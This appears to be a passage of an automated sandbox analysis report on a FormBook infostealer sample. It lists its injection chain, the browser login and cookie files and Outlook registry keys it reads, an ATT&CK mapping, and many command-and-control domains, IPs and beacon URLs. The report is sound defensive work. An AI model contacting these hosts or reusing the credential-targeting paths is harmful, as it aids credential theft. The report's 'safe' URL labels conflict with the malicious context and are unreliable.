                Source: iBkWOgpZKSoi.exe, 00000006.00000000.1554508698.0000000000BA1000.00000002.00000001.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000002.3811475656.0000000000BA0000.00000002.00000001.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710069200.0000000000F61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                Source: iBkWOgpZKSoi.exe, 00000006.00000000.1554508698.0000000000BA1000.00000002.00000001.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000002.3811475656.0000000000BA0000.00000002.00000001.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710069200.0000000000F61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeQueries volume information: C:\Users\user\Desktop\suBpo1g13Q.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.suBpo1g13Q.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.suBpo1g13Q.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1637335809.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3813776931.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3813875432.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3813882427.00000000022E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1638525330.00000000017C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\waitfor.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.suBpo1g13Q.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.suBpo1g13Q.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1637335809.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3813776931.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3813875432.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3813882427.00000000022E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1638525330.00000000017C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588629 Sample: suBpo1g13Q.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 33 www.optimismbank.xyz 2->33 35 www.jcsa.info 2->35 37 13 other IPs or domains 2->37 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 53 3 other signatures 2->53 10 suBpo1g13Q.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 33->51 process4 file5 31 C:\Users\user\AppData\...\suBpo1g13Q.exe.log, ASCII 10->31 dropped 67 Injects a PE file into a foreign processes 10->67 14 suBpo1g13Q.exe 10->14         started        17 suBpo1g13Q.exe 10->17         started        signatures6 process7 signatures8 69 Maps a DLL or memory area into another process 14->69 19 iBkWOgpZKSoi.exe 14->19 injected process9 signatures10 55 Found direct / indirect Syscall (likely to bypass EDR) 19->55 22 waitfor.exe 13 19->22         started        process11 signatures12 57 Tries to steal Mail credentials (via file / registry access) 22->57 59 Tries to harvest and steal browser information (history, passwords, etc) 22->59 61 Modifies the context of a thread in another process (thread injection) 22->61 63 3 other signatures 22->63 25 iBkWOgpZKSoi.exe 22->25 injected 29 firefox.exe 22->29         started        process13 dnsIp14 39 thaor56.online 202.92.5.23, 49981, 80 VNPT-AS-VNVNPTCorpVN Viet Nam 25->39 41 www.greenthub.life 209.74.77.109, 51532, 51533, 51534 MULTIBAND-NEWHOPEUS United States 25->41 43 10 other IPs or domains 25->43 65 Found direct / indirect Syscall (likely to bypass EDR) 25->65 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                suBpo1g13Q.exe39%VirustotalBrowse
                suBpo1g13Q.exe68%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                suBpo1g13Q.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.bankseedz.info/uf7y/0%Avira URL Cloudsafe
                http://www.madhf.tech/3iym/0%Avira URL Cloudsafe
                http://www.jcsa.info/hxi5/0%Avira URL Cloudsafe
                http://www.bankseedz.info/uf7y/?P8dT=Gvw8Prk0H4&6n=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7goc5xtOfckJoEDkF4EtN7gOpTNuRUA==0%Avira URL Cloudsafe
                http://www.zkdamdjj.shop0%Avira URL Cloudsafe
                http://www.43kdd.top/p3j6/?6n=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWq9PBiy69Y2nadeDtRJ0gD55AbRoA==&P8dT=Gvw8Prk0H40%Avira URL Cloudsafe
                http://www.jcsa.info/University_of_Toronto.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iO0%Avira URL Cloudsafe
                http://www.1secondlending.one/j8pv/?P8dT=Gvw8Prk0H4&6n=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jcEPeQmL51Me3DwZ/KAlDYaGirikg==0%Avira URL Cloudsafe
                http://www.Jcsa.info0%Avira URL Cloudsafe
                http://www.greenthub.life/r3zg/0%Avira URL Cloudsafe
                http://www.optimismbank.xyz/98j3/?6n=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbyhLLQuZT4Au5NQMQhm1oIOAMIGMg==&P8dT=Gvw8Prk0H40%Avira URL Cloudsafe
                http://www.jcsa.info/Business_Degrees.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iOjPH200%Avira URL Cloudsafe
                http://www.laohub10.net/n2c9/0%Avira URL Cloudsafe
                http://www.zkdamdjj.shop/swhs/?6n=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0BhNgyFEMOmWGxKSf7yVXLPttL2EQ==&P8dT=Gvw8Prk0H40%Avira URL Cloudsafe
                http://www.jcsa.info/Course_Descriptions.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iOjP0%Avira URL Cloudsafe
                http://www.madhf.tech/3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZC8haYSThO7dC1CsRTUMY0QRbxSNQ==&P8dT=Gvw8Prk0H40%Avira URL Cloudsafe
                http://www.thaor56.online/fev0/?6n=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKn/+Qn9LZj60FJTogwY+WbqWfqijUMg==&P8dT=Gvw8Prk0H40%Avira URL Cloudsafe
                http://www.register.com/?trkID=WSTm3u15CW0%Avira URL Cloudsafe
                http://www.optimismbank.xyz/98j3/0%Avira URL Cloudsafe
                http://www.madhf.tech/3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBY0%Avira URL Cloudsafe
                http://www.jcsa.info/display.cfm0%Avira URL Cloudsafe
                http://www.xcvbj.asia/hkgx/?6n=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUvSVPlvrZOPxTHwBspwPrhhwxEcqkEw==&P8dT=Gvw8Prk0H40%Avira URL Cloudsafe
                http://www.43kdd.top/p3j6/0%Avira URL Cloudsafe
                http://www.laohub10.net/n2c9/?6n=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvFKcHVyRNQ0lpxItwqxseE7Zdzalg==&P8dT=Gvw8Prk0H40%Avira URL Cloudsafe
                http://www.yc791022.asia/31pt/?6n=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0BgzzdODOQRhsaLMWye0XS2e8Pang==&P8dT=Gvw8Prk0H40%Avira URL Cloudsafe
                http://www.jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dflt0%Avira URL Cloudsafe
                http://www.yc791022.asia/31pt/0%Avira URL Cloudsafe
                http://www.zkdamdjj.shop/swhs/0%Avira URL Cloudsafe
                http://www.jcsa.info/Best_Online_University.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0i0%Avira URL Cloudsafe
                http://www.greenthub.life/r3zg/?P8dT=Gvw8Prk0H4&6n=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06bVBzroOuQGNKcNgifQ36nJgHTvH4A==0%Avira URL Cloudsafe
                https://www.register.com/whois.rcmx?domainName=Jcsa.info0%Avira URL Cloudsafe
                http://www.register.com?trkID=WSTm3u15CW0%Avira URL Cloudsafe
                http://www.jcsa.info/hxi5/?6n=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECON3mfxJeBtjbn7k9Vw2XGkLNgd8mA==&P8dT=Gvw8Prk0H40%Avira URL Cloudsafe
                http://www.xcvbj.asia/hkgx/0%Avira URL Cloudsafe
                http://www.jcsa.info/Japanese_Language_School.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0%Avira URL Cloudsafe
                http://www.1secondlending.one/j8pv/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.bankseedz.info
                		46.30.211.38
                		truefalse
                  		high
                  www.optimismbank.xyz
                  		13.248.169.48
                  		truetrue
                    		unknown
                    www.madhf.tech
                    		103.224.182.242
                    		truefalse
                      		high
                      s-part-0017.t-0009.t-msedge.net
                      		13.107.246.45
                      		truefalse
                        		high
                        r0lqcud7.nbnnn.xyz
                        		23.225.159.42
                        		truefalse
                          		high
                          www.xcvbj.asia
                          		149.88.81.190
                          		truefalse
                            		high
                            43kdd.top
                            		154.23.178.231
                            		truefalse
                              		high
                              thaor56.online
                              		202.92.5.23
                              		truetrue
                                		unknown
                                www.1secondlending.one
                                		43.205.198.29
                                		truefalse
                                  		high
                                  www.zkdamdjj.shop
                                  		188.114.97.3
                                  		truefalse
                                    		high
                                    www.jcsa.info
                                    		208.91.197.39
                                    		truetrue
                                      		unknown
                                      www.yc791022.asia
                                      		101.35.209.183
                                      		truefalse
                                        		high
                                        www.greenthub.life
                                        		209.74.77.109
                                        		truetrue
                                          		unknown
                                          www.laohub10.net
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.thaor56.online
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.43kdd.top
                                              		unknown
                                              		unknownfalse
                                                		high

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.bankseedz.info/uf7y/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.madhf.tech/3iym/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.jcsa.info/hxi5/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.43kdd.top/p3j6/?6n=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWq9PBiy69Y2nadeDtRJ0gD55AbRoA==&P8dT=Gvw8Prk0H4true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.greenthub.life/r3zg/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.1secondlending.one/j8pv/?P8dT=Gvw8Prk0H4&6n=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jcEPeQmL51Me3DwZ/KAlDYaGirikg==true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.bankseedz.info/uf7y/?P8dT=Gvw8Prk0H4&6n=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7goc5xtOfckJoEDkF4EtN7gOpTNuRUA==true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.optimismbank.xyz/98j3/?6n=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbyhLLQuZT4Au5NQMQhm1oIOAMIGMg==&P8dT=Gvw8Prk0H4true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.laohub10.net/n2c9/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.zkdamdjj.shop/swhs/?6n=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0BhNgyFEMOmWGxKSf7yVXLPttL2EQ==&P8dT=Gvw8Prk0H4true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.madhf.tech/3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZC8haYSThO7dC1CsRTUMY0QRbxSNQ==&P8dT=Gvw8Prk0H4true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.thaor56.online/fev0/?6n=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKn/+Qn9LZj60FJTogwY+WbqWfqijUMg==&P8dT=Gvw8Prk0H4true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.optimismbank.xyz/98j3/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.xcvbj.asia/hkgx/?6n=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUvSVPlvrZOPxTHwBspwPrhhwxEcqkEw==&P8dT=Gvw8Prk0H4true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.yc791022.asia/31pt/?6n=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0BgzzdODOQRhsaLMWye0XS2e8Pang==&P8dT=Gvw8Prk0H4true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.43kdd.top/p3j6/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.laohub10.net/n2c9/?6n=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvFKcHVyRNQ0lpxItwqxseE7Zdzalg==&P8dT=Gvw8Prk0H4true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.yc791022.asia/31pt/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.zkdamdjj.shop/swhs/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.jcsa.info/hxi5/?6n=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECON3mfxJeBtjbn7k9Vw2XGkLNgd8mA==&P8dT=Gvw8Prk0H4true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.xcvbj.asia/hkgx/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.greenthub.life/r3zg/?P8dT=Gvw8Prk0H4&6n=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06bVBzroOuQGNKcNgifQ36nJgHTvH4A==true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.1secondlending.one/j8pv/true
                                                • Avira URL Cloud: safe
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabwaitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://dts.gnpge.comiBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/ac/?q=waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.zkdamdjj.shopiBkWOgpZKSoi.exe, 00000008.00000002.3816364731.0000000004E43000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotwaitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://cdn.consentmanager.netwaitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          http://www.jcsa.info/University_of_Toronto.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iOwaitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfwaitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.Jcsa.infowaitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i4.cdn-image.com/__media__/pics/29590/bg1.png)waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                http://i4.cdn-image.com/__media__/pics/8934/rcomlogo.jpgwaitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.jcsa.info/Business_Degrees.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iOjPH20waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfwaitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwaitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.jcsa.info/Course_Descriptions.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iOjPwaitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
